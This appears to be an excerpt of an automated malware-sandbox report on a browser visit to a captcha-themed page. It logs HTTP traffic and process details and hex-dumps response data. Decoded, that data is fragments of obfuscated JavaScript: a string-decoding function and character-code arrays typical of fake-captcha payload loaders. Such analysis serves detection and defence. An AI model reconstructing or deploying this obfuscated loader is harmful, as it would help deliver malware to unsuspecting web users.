                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=7339&min_rtt=7337&rtt_var=2753&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2879&recv_bytes=1163&delivery_rate=397982&cwnd=32&unsent_bytes=0&cid=bfeaa16c3f144986&ts=313&x=0"
                2025-01-16 07:07:35 UTC1369INData Raw: 36 36 6f 37 35 53 36 65 65 36 33 64 37 34 6c 36 39 54 36 66 71 36 65 6b 32 30 64 37 34 6c 35 35 77 37 37 4c 36 63 41 37 61 64 35 34 6e 32 38 47 36 33 67 36 31 48 34 66 42 36 39 66 32 39 7a 37 62 70 37 36 73 36 31 49 37 32 49 32 30 63 35 36 58 34 64 63 36 61 4b 35 61 52 36 62 43 37 61 47 33 64 62 32 30 71 32 37 68 32 37 75 33 62 46 36 36 76 36 66 79 37 32 67 32 30 59 32 38 6a 37 36 55 36 31 4c 37 32 69 32 30 76 34 66 63 35 35 78 37 38 62 37 37 63 36 36 57 34 38 6c 32 30 64 33 64 74 32 30 64 33 30 7a 33 62 61 34 66 56 35 35 55 37 38 49 37 37 77 36 36 4e 34 38 61 32 30 4c 33 63 69 32 30 71 36 33 6a 36 31 4a 34 66 76 36 39 74 32 65 42 36 63 6b 36 35 4a 36 65 56 36 37 48 37 34 50 36 38 56 33 62 68 32 30 5a 34 66 4d 35 35 7a 37 38 61 37 37 42 36 36 69 34 38 76
                Data Ascii: 66o75S6ee63d74l69T6fq6ek20d74l55w77L6cA7ad54n28G63g61H4fB69f29z7bp76s61I72I20c56X4dc6aK5aR6bC7aG3db20q27h27u3bF66v6fy72g20Y28j76U61L72i20v4fc55x78b77c66W48l20d3dt20d30z3ba4fV55U78I77w66N48a20L3ci20q63j61J4fv69t2eB6ck65J6eV67H74P68V3bh20Z4fM55z78a77B66i48v
                2025-01-16 07:07:35 UTC1369INData Raw: 63 64 33 32 73 33 39 4c 33 30 67 32 63 55 33 33 49 33 30 76 33 37 42 32 63 50 33 33 4c 33 30 42 33 36 79 32 63 69 33 32 73 33 39 4d 33 30 6f 32 63 41 33 33 57 33 34 74 33 37 53 32 63 74 33 32 70 33 39 57 33 30 74 32 63 4d 33 32 44 33 39 47 33 36 79 32 63 47 33 32 45 33 39 41 33 34 4f 32 63 6c 33 32 48 33 39 4b 33 30 47 32 63 6b 33 33 4b 33 30 69 33 39 73 32 63 59 33 33 46 33 32 58 33 38 69 32 63 62 33 32 52 33 39 71 33 31 6d 32 63 61 33 33 4b 33 34 67 33 37 6c 32 63 53 33 32 59 33 39 4b 33 30 6e 32 63 57 33 32 52 33 39 54 33 35 51 32 63 43 33 33 77 33 30 75 33 36 4c 32 63 4c 33 32 6e 33 39 4d 33 30 61 32 63 68 33 33 46 33 32 44 33 33 70 32 63 6f 33 33 42 33 30 74 33 36 6e 32 63 52 33 32 6f 33 39 52 33 31 76 32 63 4e 33 33 55 33 31 59 33 34 76 32 63 59 33
                Data Ascii: cd32s39L30g2cU33I30v37B2cP33L30B36y2ci32s39M30o2cA33W34t37S2ct32p39W30t2cM32D39G36y2cG32E39A34O2cl32H39K30G2ck33K30i39s2cY33F32X38i2cb32R39q31m2ca33K34g37l2cS32Y39K30n2cW32R39T35Q2cC33w30u36L2cL32n39M30a2ch33F32D33p2co33B30t36n2cR32o39R31v2cN33U31Y34v2cY3
                2025-01-16 07:07:35 UTC1369INData Raw: 45 33 33 56 33 32 52 33 38 4e 32 63 65 33 32 68 33 39 47 33 31 57 32 63 6b 33 33 78 33 32 67 33 39 75 32 63 42 33 32 6c 33 39 61 33 30 41 32 63 6d 33 32 75 33 39 6e 33 34 75 32 63 51 33 33 49 33 31 53 33 30 4f 32 63 49 33 32 47 33 39 63 33 30 54 32 63 4a 33 33 59 33 32 79 33 35 7a 32 63 5a 33 33 48 33 32 79 33 38 51 32 63 4f 33 32 4e 33 39 49 33 31 6a 32 63 61 33 33 56 33 30 49 33 37 69 32 63 4e 33 32 54 33 39 50 33 30 43 32 63 4f 33 32 6d 33 39 4d 33 33 71 32 63 66 33 32 67 33 39 4c 33 30 76 32 63 43 33 32 43 33 39 45 33 30 58 32 63 45 33 33 6d 33 32 4e 33 33 4d 32 63 79 33 33 68 33 30 55 33 36 74 32 63 6e 33 32 4a 33 39 6c 33 31 59 32 63 6d 33 33 44 33 33 54 33 34 76 32 63 41 33 32 6a 33 39 41 33 30 6f 32 63 72 33 32 61 33 39 46 33 33 58 32 63 4c 33 32
                Data Ascii: E33V32R38N2ce32h39G31W2ck33x32g39u2cB32l39a30A2cm32u39n34u2cQ33I31S30O2cI32G39c30T2cJ33Y32y35z2cZ33H32y38Q2cO32N39I31j2ca33V30I37i2cN32T39P30C2cO32m39M33q2cf32g39L30v2cC32C39E30X2cE33m32N33M2cy33h30U36t2cn32J39l31Y2cm33D33T34v2cA32j39A30o2cr32a39F33X2cL32
                2025-01-16 07:07:35 UTC1369INData Raw: 33 33 47 33 33 41 33 30 4c 32 63 6e 33 32 4b 33 39 78 33 30 57 32 63 4f 33 32 53 33 39 64 33 37 44 32 63 49 33 33 77 33 32 68 33 34 4d 32 63 46 33 32 61 33 39 64 33 30 74 32 63 7a 33 33 58 33 30 7a 33 38 57 32 63 43 33 33 4d 33 34 53 33 34 56 32 63 42 33 32 77 33 39 58 33 31 56 32 63 4c 33 33 77 33 30 7a 33 36 62 32 63 63 33 32 76 33 39 48 33 30 4f 32 63 58 33 32 55 33 39 75 33 33 47 32 63 4d 33 33 74 33 32 4d 33 34 65 32 63 48 33 32 50 33 39 6b 33 30 54 32 63 49 33 33 55 33 30 73 33 38 48 32 63 47 33 33 65 33 30 4a 33 36 61 32 63 72 33 32 62 33 39 56 33 31 53 32 63 76 33 33 48 33 30 72 33 33 4c 32 63 78 33 32 47 33 39 6a 33 30 4b 32 63 54 33 32 50 33 39 57 33 36 65 32 63 63 33 33 73 33 34 4a 33 34 49 32 63 41 33 32 6f 33 39 4f 33 30 6c 32 63 4c 33 33 44
                Data Ascii: 33G33A30L2cn32K39x30W2cO32S39d37D2cI33w32h34M2cF32a39d30t2cz33X30z38W2cC33M34S34V2cB32w39X31V2cL33w30z36b2cc32v39H30O2cX32U39u33G2cM33t32M34e2cH32P39k30T2cI33U30s38H2cG33e30J36a2cr32b39V31S2cv33H30r33L2cx32G39j30K2cT32P39W36e2cc33s34J34I2cA32o39O30l2cL33D
                2025-01-16 07:07:35 UTC1369INData Raw: 32 6d 33 39 6b 33 33 6e 32 63 65 33 32 55 33 39 4d 33 34 6e 32 63 75 33 32 68 33 39 7a 33 30 58 32 63 48 33 33 44 33 31 6c 33 32 6e 32 63 61 33 33 52 33 30 69 33 36 4c 32 63 77 33 32 6e 33 39 43 33 31 70 32 63 49 33 32 4c 33 39 76 33 38 41 32 63 45 33 32 75 33 39 73 33 30 6a 32 63 6b 33 32 5a 33 39 7a 33 33 6c 32 63 4c 33 33 6b 33 32 5a 33 34 6a 32 63 6d 33 32 7a 33 39 4f 33 30 6a 32 63 53 33 33 69 33 31 70 33 31 6a 32 63 61 33 33 4f 33 30 59 33 36 66 32 63 4e 33 32 66 33 39 50 33 30 71 32 63 6b 33 32 75 33 37 66 33 34 53 32 63 5a 33 32 4c 33 39 69 33 30 7a 32 63 70 33 32 51 33 39 6d 33 37 68 32 63 44 33 33 7a 33 30 63 33 32 71 32 63 72 33 32 7a 33 39 5a 33 30 78 32 63 59 33 33 54 33 31 58 33 35 5a 32 63 57 33 33 4c 33 32 5a 33 38 71 32 63 56 33 32 4e 33
                Data Ascii: 2m39k33n2ce32U39M34n2cu32h39z30X2cH33D31l32n2ca33R30i36L2cw32n39C31p2cI32L39v38A2cE32u39s30j2ck32Z39z33l2cL33k32Z34j2cm32z39O30j2cS33i31p31j2ca33O30Y36f2cN32f39P30q2ck32u37f34S2cZ32L39i30z2cp32Q39m37h2cD33z30c32q2cr32z39Z30x2cY33T31X35Z2cW33L32Z38q2cV32N3
                2025-01-16 07:07:35 UTC1369INData Raw: 52 33 39 54 33 30 51 32 63 47 33 33 61 33 32 4b 33 33 69 32 63 5a 33 33 72 33 30 73 33 36 76 32 63 76 33 32 51 33 39 79 33 31 44 32 63 77 33 33 6a 33 33 57 33 34 63 32 63 77 33 32 68 33 39 4e 33 30 4d 32 63 55 33 32 49 33 39 6c 33 33 72 32 63 67 33 32 64 33 39 4d 33 30 69 32 63 55 33 32 72 33 39 53 33 30 55 32 63 4f 33 33 72 33 30 59 33 36 47 32 63 4e 33 33 55 33 32 74 33 38 57 32 63 59 33 32 4d 33 39 6d 33 31 4c 32 63 4a 33 33 68 33 30 58 33 36 77 32 63 58 33 32 6b 33 39 70 33 30 46 32 63 45 33 32 47 33 39 77 33 34 79 32 63 6f 33 33 53 33 31 42 33 30 76 32 63 66 33 32 4a 33 39 62 33 30 45 32 63 79 33 33 64 33 31 6f 33 30 45 32 63 4c 33 33 51 33 30 50 33 36 62 32 63 6f 33 32 71 33 39 6f 33 31 48 32 63 56 33 32 61 33 37 68 33 39 7a 32 63 47 33 32 51 33 39
                Data Ascii: R39T30Q2cG33a32K33i2cZ33r30s36v2cv32Q39y31D2cw33j33W34c2cw32h39N30M2cU32I39l33r2cg32d39M30i2cU32r39S30U2cO33r30Y36G2cN33U32t38W2cY32M39m31L2cJ33h30X36w2cX32k39p30F2cE32G39w34y2co33S31B30v2cf32J39b30E2cy33d31o30E2cL33Q30P36b2co32q39o31H2cV32a37h39z2cG32Q39
                2025-01-16 07:07:35 UTC1369INData Raw: 33 30 63 33 36 61 32 63 6c 33 32 53 33 39 42 33 30 66 32 63 67 33 33 4f 33 34 53 33 35 68 32 63 65 33 32 41 33 39 4a 33 30 42 32 63 56 33 32 7a 33 39 6b 33 35 69 32 63 76 33 33 58 33 33 4e 33 36 54 32 63 49 33 32 41 33 39 51 33 30 46 32 63 75 33 33 62 33 32 43 33 32 4f 32 63 77 33 33 57 33 34 54 33 34 72 32 63 52 33 32 75 33 39 54 33 31 71 32 63 70 33 33 5a 33 33 54 33 31 66 32 63 67 33 32 54 33 39 47 33 30 4a 32 63 63 33 32 6f 33 39 41 33 35 4a 32 63 47 33 33 57 33 31 5a 33 30 75 32 63 43 33 32 49 33 39 53 33 30 6b 32 63 43 33 33 77 33 32 6b 33 33 46 32 63 4c 33 33 44 33 34 6c 33 34 49 32 63 67 33 32 53 33 39 6b 33 31 62 32 63 66 33 32 74 33 39 73 33 37 56 32 63 44 33 32 69 33 39 6e 33 30 6f 32 63 74 33 32 48 33 39 63 33 34 46 32 63 62 33 33 74 33 32 49
                Data Ascii: 30c36a2cl32S39B30f2cg33O34S35h2ce32A39J30B2cV32z39k35i2cv33X33N36T2cI32A39Q30F2cu33b32C32O2cw33W34T34r2cR32u39T31q2cp33Z33T31f2cg32T39G30J2cc32o39A35J2cG33W31Z30u2cC32I39S30k2cC33w32k33F2cL33D34l34I2cg32S39k31b2cf32t39s37V2cD32i39n30o2ct32H39c34F2cb33t32I
                2025-01-16 07:07:35 UTC1369INData Raw: 37 65 33 35 55 32 63 70 33 32 78 33 39 78 33 30 53 32 63 6b 33 32 64 33 39 66 33 37 52 32 63 67 33 32 4f 33 39 6e 33 38 4d 32 63 47 33 32 68 33 39 7a 33 30 67 32 63 4c 33 33 54 33 30 47 33 36 78 32 63 5a 33 33 65 33 32 56 33 38 58 32 63 69 33 32 44 33 39 6e 33 31 43 32 63 48 33 32 4a 33 39 6e 33 33 41 32 63 76 33 32 54 33 39 52 33 30 6c 32 63 77 33 32 58 33 39 66 33 37 6d 32 63 58 33 33 73 33 30 56 33 36 59 32 63 77 33 32 6e 33 39 45 33 30 58 32 63 54 33 33 55 33 30 47 33 39 42 32 63 50 33 33 68 33 30 75 33 36 4c 32 63 63 33 32 61 33 39 6b 33 31 68 32 63 70 33 33 64 33 33 4b 33 39 58 32 63 62 33 32 6d 33 39 51 33 30 6d 32 63 50 33 32 4e 33 39 6b 33 34 6e 32 63 6e 33 33 55 33 30 5a 33 36 67 32 63 49 33 32 77 33 39 62 33 30 75 32 63 79 33 33 51 33 30 6a 33
                Data Ascii: 7e35U2cp32x39x30S2ck32d39f37R2cg32O39n38M2cG32h39z30g2cL33T30G36x2cZ33e32V38X2ci32D39n31C2cH32J39n33A2cv32T39R30l2cw32X39f37m2cX33s30V36Y2cw32n39E30X2cT33U30G39B2cP33h30u36L2cc32a39k31h2cp33d33K39X2cb32m39Q30m2cP32N39k34n2cn33U30Z36g2cI32w39b30u2cy33Q30j3
                2025-01-16 07:07:35 UTC1369INData Raw: 61 33 37 78 32 63 50 33 33 70 33 30 67 33 36 6b 32 63 4f 33 32 63 33 39 50 33 30 76 32 63 4a 33 33 42 33 32 55 33 36 55 32 63 45 33 33 57 33 32 61 33 38 78 32 63 4b 33 32 64 33 39 45 33 31 63 32 63 66 33 32 4d 33 37 48 33 33 73 32 63 55 33 32 56 33 39 55 33 30 76 32 63 72 33 32 6a 33 39 53 33 34 59 32 63 76 33 32 41 33 39 6f 33 38 6a 32 63 51 33 32 79 33 39 4c 33 30 74 32 63 7a 33 33 57 33 30 55 33 32 61 32 63 44 33 33 70 33 30 49 33 36 50 32 63 66 33 32 77 33 39 76 33 31 6f 32 63 7a 33 33 79 33 34 52 33 33 44 32 63 68 33 32 6f 33 39 50 33 30 73 32 63 48 33 32 55 33 39 44 33 37 5a 32 63 6a 33 33 76 33 30 5a 33 32 44 32 63 68 33 32 72 33 39 67 33 30 4c 32 63 53 33 33 4b 33 32 63 33 32 4a 32 63 72 33 32 67 33 39 70 33 30 66 32 63 4e 33 32 46 33 39 50 33 30
                Data Ascii: a37x2cP33p30g36k2cO32c39P30v2cJ33B32U36U2cE33W32a38x2cK32d39E31c2cf32M37H33s2cU32V39U30v2cr32j39S34Y2cv32A39o38j2cQ32y39L30t2cz33W30U32a2cD33p30I36P2cf32w39v31o2cz33y34R33D2ch32o39P30s2cH32U39D37Z2cj33v30Z32D2ch32r39g30L2cS33K32c32J2cr32g39p30f2cN32F39P30
                2025-01-16 07:07:35 UTC1369INData Raw: 33 30 47 32 63 72 33 33 73 33 30 4d 33 38 75 32 63 75 33 32 6d 33 39 61 33 30 59 32 63 47 33 32 41 33 39 65 33 31 63 32 63 7a 33 32 73 33 39 55 33 36 7a 32 63 6f 33 32 57 33 39 4a 33 30 59 32 63 45 33 32 6f 33 39 68 33 34 6f 32 63 57 33 33 4c 33 34 69 33 34 4b 32 63 48 33 32 72 33 39 63 33 30 64 32 63 7a 33 33 4b 33 32 6b 33 35 59 32 63 6a 33 32 67 33 39 4b 33 30 59 32 63 68 33 32 77 33 39 79 33 31 46 32 63 4d 33 33 43 33 32 67 33 39 66 32 63 6d 33 32 72 33 39 61 33 30 4b 32 63 44 33 32 73 33 39 43 33 36 44 32 63 4c 33 33 58 33 33 58 33 36 6a 32 63 45 33 32 50 33 39 52 33 30 50 32 63 58 33 33 42 33 31 64 33 31 70 32 63 49 33 32 77 33 39 51 33 30 49 32 63 4d 33 32 6c 33 39 72 33 31 48 32 63 71 33 33 62 33 30 63 33 35 54 32 63 66 33 32 43 33 39 59 33 30 50
                Data Ascii: 30G2cr33s30M38u2cu32m39a30Y2cG32A39e31c2cz32s39U36z2co32W39J30Y2cE32o39h34o2cW33L34i34K2cH32r39c30d2cz33K32k35Y2cj32g39K30Y2ch32w39y31F2cM33C32g39f2cm32r39a30K2cD32s39C36D2cL33X33X36j2cE32P39R30P2cX33B31d31p2cI32w39Q30I2cM32l39r31H2cq33b30c35T2cf32C39Y30P


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                4192.168.2.44974935.190.80.14432640C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-16 07:07:35 UTC498OUTPOST /report/v4?s=Uetpqd6yL5kqgaix3PQi1gR%2FXNZng2n5xYYxSXQowBJV7ozSkITO8w%2BiQVC8YFNKCpvNVK7dEA06FCdXQWehWq8wDflCboh5qVRTVzOMDaruYT9oVirs28mco4vuxow9sE1aKRXfpRl%2FEDqnG0QO7V0%3D HTTP/1.1
                Host: a.nel.cloudflare.com
                Connection: keep-alive
                Content-Length: 412
                Content-Type: application/reports+json
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                2025-01-16 07:07:35 UTC412OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 33 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 31 35 2e 39 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 75 31 2e 67 72 61 70 70 6c 65 72 65 74 75 72 6e
                Data Ascii: [{"age":0,"body":{"elapsed_time":1339,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.215.98","status_code":200,"type":"abandoned"},"type":"network-error","url":"https://u1.grapplereturn
                2025-01-16 07:07:35 UTC168INHTTP/1.1 200 OK
                Content-Length: 0
                date: Thu, 16 Jan 2025 07:07:34 GMT
                Via: 1.1 google
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                Connection: close


                Click to jump to process

                Click to jump to process

                Click to jump to process

                Target ID:0
                Start time:02:07:18
                Start date:16/01/2025
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Imagebase:0x7ff76e190000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:2
                Start time:02:07:21
                Start date:16/01/2025
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2488 --field-trial-handle=2460,i,15508496297560318815,11468432628565422805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Imagebase:0x7ff76e190000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:false

                Target ID:3
                Start time:02:07:28
                Start date:16/01/2025
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69"
                Imagebase:0x7ff76e190000
                File size:3'242'272 bytes
                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                No disassembly